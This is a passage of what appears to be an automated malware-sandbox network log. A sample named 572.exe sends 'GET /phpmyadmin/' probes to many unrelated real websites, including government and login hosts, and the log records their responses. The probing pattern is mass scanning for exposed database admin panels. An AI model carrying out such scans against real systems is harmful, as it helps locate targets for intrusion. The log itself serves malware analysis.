Set-Cookie: incap_ses_1816_2786379=nB8rDMrRxHTWIBA+arozGSvDwGUAAAAAM2AwV/yvpVYgUQE6hwe8qg==; path=/; Domain=.codere.com.co
X-CDN: Imperva
X-Iinfo: 50-20036917-20036927 NNNN CT(119 138 0) RT(1707131690602 937) q(0 0 2 -1) r(4 4) U24
2024-02-05 11:14:52 UTC  689                IN         Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil
2024-02-05 11:14:52 UTC  556                IN         Data Ascii: dana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Serv


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
51          192.168.2.6  55115        184.25.164.103  443               524  C:\Users\user\AppData\Local\Temp\572.exe

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:14:51 UTC  183                OUT        GET /phpmyadmin/ HTTP/1.1
Host: store.steampowered.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:52 UTC  233                IN         HTTP/1.1 302 Moved Temporarily
Server: nginx
Content-Type: text/html; charset=UTF-8
Location: https://store.steampowered.com/
Strict-Transport-Security: max-age=10368000
Date: Mon, 05 Feb 2024 11:14:52 GMT
Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
52          192.168.2.6  54857        41.33.126.100   443               524  C:\Users\user\AppData\Local\Temp\572.exe
Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:14:51 UTC  180                OUT        GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: student.emis.gov.eg
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:52 UTC  693                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 247
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: TS9c6b4a84027=08877083daab2000ac44398d65bad5d0bdc59cc1d9b57fbb99f306bf0b50b82167b0d9a8dad75642083fc86afe113000893558272290619731e1207d9a222244c7ab8c8b960f1cb19a8edcda5d9f384955a963ca891ae76ee9851a9660d5a38e; Path=/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: TSe6c21afd027=08877083daab20004a20febb636adaec7a6b19607bdd857552a89be848c3bb11633258f4aa9872e60812369166113000294753b3ad9dbf7c31e1207d9a222244e921fff6ca7f28c72fe9b0132c3f3ceadcc33e740b0ae58ac570b6d13166dc9f; Path=/
2024-02-05 11:14:52 UTC  247                IN         Data Ascii: <html><head><title>Request Rejected</title></head><body>The requested URL was rejected. Please consult with your administrator.<br><br>Your support ID is: 10506010307782609307<br><br><a href='javascript:history.back();'>[Go Back]</a></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
53          192.168.2.6  55242        172.67.148.124  443               524  C:\Users\user\AppData\Local\Temp\572.exe
Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:14:51 UTC  170                OUT        GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: loopex.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:52 UTC  733                IN         HTTP/1.1 520
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 15
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mSVxWU8F8j9jYp5gMl%2BDPTbCxE9z0dLi0jYWlY%2B4%2BbIlSIFWNS0GBhNJbtuU6cGHVhxoqurRM2IMrby4AdxwJCQT3JYLCJzOcOwoUXh%2F9xO0Obbj0vQ4k%2F6dlSo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb722b0e249b-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
2024-02-05 11:14:52 UTC  15                 IN         Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 30
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: error code: 520


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
54          192.168.2.6  55173        142.250.105.84  443               524  C:\Users\user\AppData\Local\Temp\572.exe
Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:14:51 UTC  180                OUT        GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.google.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:52 UTC  842                IN         HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' https: http:;object-src 'none';base-uri 'self';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /cspreport
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"group":"coop_gse_qebhlk","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_qebhlk"}]}
                                                                                                                                                                                                                                                                                                                                                                Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_qebhlk"
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                Server: GSE
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
2024-02-05 11:14:52 UTC  1252               IN         Data Ascii: 66A<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="IWvX1xEMxf2jfnN-xh_cFQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
2024-02-05 11:14:52 UTC  397                IN         Data Ascii: ogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></spa
2024-02-05 11:14:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.6 | 55187 | 64.91.249.20 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 173 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: chainmine.io
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:52 UTC | 243 | IN | HTTP/1.1 404 Not Found
Date: Mon, 05 Feb 2024 11:14:51 GMT
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
X-Powered-By: PHP/5.4.16
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
2024-02-05 11:14:52 UTC | 28 | IN | Data Raw: 31 38 0d 0a 3c 68 31 3e 34 30 34 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a
Data Ascii: 18<h1>404: Not Found</h1>
2024-02-05 11:14:52 UTC | 2 | IN | Data Raw: 0d 0a
Data Ascii:
2024-02-05 11:14:52 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.6 | 54596 | 195.248.251.103 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 176 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: phonandroid.com
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:52 UTC | 241 | IN | HTTP/1.1 301 Permanently moved
Date: Mon, 05 Feb 2024 11:14:52 GMT
Server: Varnish
X-Varnish: 8926329
X-Redirected-By: lxc-varnish-ressources-02
Location: https://www.phonandroid.com/phpmyadmin/
Content-Length: 0
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.6 | 55175 | 103.224.182.210 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 180 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: followerstiktok.xyz
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:52 UTC | 346 | IN | HTTP/1.1 302 Found
date: Mon, 05 Feb 2024 11:14:51 GMT
server: Apache
set-cookie: __tad=1707131692.7552465; expires=Thu, 02-Feb-2034 11:14:52 GMT; Max-Age=315360000
location: http://ww16.followerstiktok.xyz/phpmyadmin/?sub1=20240205-2214-52da-a2cf-fa6f6140149e
content-length: 2
content-type: text/html; charset=UTF-8
connection: close
2024-02-05 11:14:52 UTC | 2 | IN | Data Raw: 0a 0a
Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.6 | 54782 | 179.191.175.66 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 189 | OUT | GET /phpmyadmin/ HTTP/1.1
Host: servicossociais.caixa.gov.br
Accept: */*
Accept-Encoding: deflate, gzip
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:52 UTC | 1141 | IN | HTTP/1.1 404 /phpmyadmin/
Date: Mon, 05 Feb 2024 11:14:52 GMT
Content-Type: text/html;charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __uzma=8f55a55a-7363-4fea-8cfb-4bc7616da5ed; HttpOnly; path=/; Expires=Mon, 05-Aug-24 11:14:51 GMT ; Max-Age=15724800; SameSite=Lax
Strict-Transport-Security: max-age=15768000
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Cross-Origin-Opener-Policy: same-origin
X-XSS-Protection: 1; mode=block
Set-Cookie: __uzmb=1707131691; HttpOnly; path=/; Expires=Mon, 05-Aug-24 11:14:51 GMT ; Max-Age=15724800; SameSite=Lax
Set-Cookie: __uzme=6987; HttpOnly; path=/; Expires=Mon, 05-Aug-24 11:14:51 GMT ; Max-Age=15724800; SameSite=Lax
Set-Cookie: __uzmc=546391087875; HttpOnly; path=/; Expires=Mon, 05-Aug-24 11:14:51 GMT ; Max-Age=15724800; SameSite=Lax
Set-Cookie: __uzmd=1707131691; HttpOnly; path=/; Expires=Mon, 05-Aug-24 11:14:51 GMT ; Max-Age=15724800; SameSite=Lax
Set-Cookie: JSESSIONID=D53D4170FC1C9713EE887CFA8C4A780E.crjpcaplux001_sisgr_inter_8087; Path=/; Secure
Set-Cookie: cYZxyhvMuF66=v1jvZWgw__wwB; Expires=Mon, 05-Feb-2024 11:29:52 GMT; Path=/
2024-02-05 11:14:52 UTC | 2955 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1ff8<html><head><title>Caixa Eco&ocirc;nmica Federal - Sistema Integrado de Seguran&ccedil;a</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><link rel="stylesheet" type="text/css" href="css/men
2024-02-05 11:14:52 UTC | 4096 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: pe="text/css" href="_newcss/home_2011/home_lores.css" /><META name="ROBOTS" content="FOLLOW,INDEX"></head><body><div id="home_geral"><div id="home_cabecalho"><div id="cabecalho_2011_content">
2024-02-05 11:14:52 UTC | 4096 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: x; margin-bottom:20px; border:0px"><img src="imagens/index/ambiente-seguro.PNG" alt="Voc&ecirc; est&aacute; em um ambiente seguro" title="Voc&ecirc; est&aacute; em um ambiente seguro" style="margin-left:-20px"></div><form name="Redirec
2024-02-05 11:14:52 UTC | 4096 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: }).blur();// }// )/*************************************************************************Fim Complemento para Funo aumenta a fonte em tr tamanhos fixo*****************************************************************
2024-02-05 11:14:52 UTC | 1423 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: .caixa.gov.br/acaixa/transparencia.asp">Transparncia Pblica</A> </DIV></div></div><div id="home_ferramentas"><div id="ferramentas_2011_content"><div id="rodape_ferramentas"><UL class="idiomas"><LI><A title=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.6 | 54682 | 104.21.14.245 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 175 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ag.ufa9999.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:52 UTC | 679 | IN | HTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 4513
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Referrer-Policy: same-origin
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=15
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 11:15:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Tj8dIEbTwSPdWNRznsFeewEw2uBurTvW5HG%2BPlLAwOevNGojn%2F26SKJGRDCitS6gkz%2BBMsqGNSmBc1Dxj89MlLsVbj4PzmK3u6CWH%2FhwR6epHZQPAd4IXlPagk4mp4ilDg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abb72ea414503-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
2024-02-05 11:14:52 UTC | 690 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE
2024-02-05 11:14:52 UTC | 1369 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: /cdn-cgi/styles/cf.errors.css" />...[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabl
2024-02-05 11:14:52 UTC | 1369 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: mns two"> <div class="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-translate="blocked_why_detail">This website is using a security service to protect itself from online atta
2024-02-05 11:14:52 UTC | 1085 | IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: :mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">81.181.57.74</span> <span class="cf-footer-separator sm:hidden">&bull;<


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
60 | 192.168.2.6 | 54835 | 188.212.100.154 | 443 | 524 | C:\Users\user\AppData\Local\Temp\572.exe
Timestamp | Bytes transferred | Direction | Data
2024-02-05 11:14:51 UTC | 172 | OUT | GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: zarkana2.ro
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC | 543 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                set-cookie: PHPSESSID=rtur6hoqaf21rvl5kkdt1jqlm7; path=/; secure
                                                                                                                                                                                                                                                                                                                                                                expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:18 GMT
                                                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-02-05 11:14:53 UTC  825  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 2163<html><head><meta property="og:url" content="https://zarkana2.ro/" /><meta property="og:type" content="website" /><meta property="og:title" content="Zarkana2 - PVM HARD" /><meta property="og:description" content="Zarkana2 este cel mai bun serve
2024-02-05 11:14:53 UTC  7730  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: clasic,server,privat,server privat" /><meta name="viewport" content="width=1110"><title>Zarkana2 - PVM HARD</title><link rel="icon" type="image/png" href="images/favicon.png" ><script async src="https://www.googletagmanager.com/gtag/js?id=UA-75635721-
2024-02-05 11:14:53 UTC  3789  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ec1<tr class="top"><td width="25"><img src='images/ranking/ranking_first_place.png' /></td><td width="100">Unique</td></tr> <tr><td colspan="3" height="5"></td></tr></table></td> </tr> <tr> <td><img src="images/wmbm2_19


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
61          192.168.2.6  54865        104.255.105.79  443               524  C:\Users\user\AppData\Local\Temp\572.exe

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:14:51 UTC  185                OUT        GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: signin.rockstargames.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:52 UTC  1463               IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                DBI: aa1ab776c9c33156e0ec0f4fd18c8cafd0ef4a16
                                                                                                                                                                                                                                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: default-src *.rockstargames.com s.rsg.sc; script-src 'nonce-lnM7PYB6x3ufst9kFzOvVjP6PBUrbFeskimNQPt0QTY=' 'report-sample' *.rockstargames.com s.rsg.sc cdn.cookielaw.org www.google-analytics.com *.googletagmanager.com rockstar-api.arkoselabs.com rockstar-api.arkoselabs.cn recaptcha.net; img-src https:; frame-src *.arkoselabs.com recaptcha.net; connect-src *.rockstargames.com *.google-analytics.com *.doubleclick.net *.sentry.io *.lifeinvader.com *.analytics.google.com *.googletagmanager.com cdn.cookielaw.org geolocation.onetrust.com privacyportal.onetrust.com; style-src 'unsafe-inline' *.rockstargames.com s.rsg.sc translate.googleapis.com; object-src 'none'; font-src fonts.gstatic.com; report-uri https://scapi.rockstargames.com/report/cspViolation;
                                                                                                                                                                                                                                                                                                                                                                CorrelationId: 783b8dad-7652-41b3-913c-8d69978e12df
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: session-id=240bc59b-14a4-4fab-8a2f-a78effb5f732; path=/; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                X-UA-Compatible: IE=Edge
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:51 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 3109
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: TS01a305c4=01e681cfdb39ec27aca0a4072d6631b19b97eca4c5fb3b1cef86a0a19daa3b184eb640d8e90044014dd90f9f20b180fc130a14f2e7c028e3c0682c07df109729c97fdfb218; Path=/
2024-02-05 11:14:52 UTC  3109  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html>...[if lte IE 10 ]><html class="ielt10" lang="en-US"> <![endif]-->...[if (gt IE 9)|!(IE)]>...><html class="" lang="en-US">...<![endif]--><head> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta charset="u


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
62          192.168.2.6  54620        178.16.128.181  443               524  C:\Users\user\AppData\Local\Temp\572.exe

Timestamp                Bytes transferred  Direction  Data
2024-02-05 11:14:51 UTC  173                OUT        GET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mobilsam.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-05 11:14:53 UTC  762                IN         HTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                x-powered-by: PHP/8.1.26
                                                                                                                                                                                                                                                                                                                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                link: <https://mobilsam.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                                                                                                                                x-litespeed-cache-control: public,max-age=3600
                                                                                                                                                                                                                                                                                                                                                                x-litespeed-tag: 106_HTTP.404,106_404,106_URL.ba909b44cf9b50134ed01a5f820a730d,106_
                                                                                                                                                                                                                                                                                                                                                                x-litespeed-cache: miss
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:14:52 GMT
                                                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                platform: hostinger
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: upgrade-insecure-requests
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-02-05 11:14:53 UTC  606  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 10000<!DOCTYPE html>...[if IE 8]><html class="ie8"><![endif]-->...[if IE 9]><html class="ie9"><![endif]-->...[if gt IE 8]>...> <html lang="en-US"> ...<![endif]--><head>... Google tag (gtag.js) --><script async src="https://www.googletagman
2024-02-05 11:14:53 UTC  14994  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: WkAuIwXVE3Zm5uR0lKEfKTHdL2C3k" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="user-scalable=yes, width=device-width, initial-scale=1.0, maximum-scale=1">... Global site tag (gtag.js) - Google Anal
2024-02-05 11:14:53 UTC  16384  IN
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: s-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-fon
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC16384INData Raw: 61 6d 65 22 3e 43 6f 6e 74 61 63 74 20 55 73 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 0d 0a 09 09 0d 0a 0d 0a 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 68 65 61 64 65 72 2d 31 2d 77 72 61 70 70 65 72 20 68 65 61 64 65 72 2d 6d 61 69 6e 2d 61 72 65 61 22 3e 09 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 63 65 2d 72 65 73 2d 6e 61 76 22 3e 0d 0a 09 3c 61 20 63 6c 61 73 73 3d 22 76 63 65 2d 72 65 73 70 6f 6e 73 69 76 65 2d 6e 61 76 22 20 68 72 65 66 3d 22 23 73 69 64 72 2d 6d 61 69 6e 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 62 61 72 73 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 3c 2f 64 69
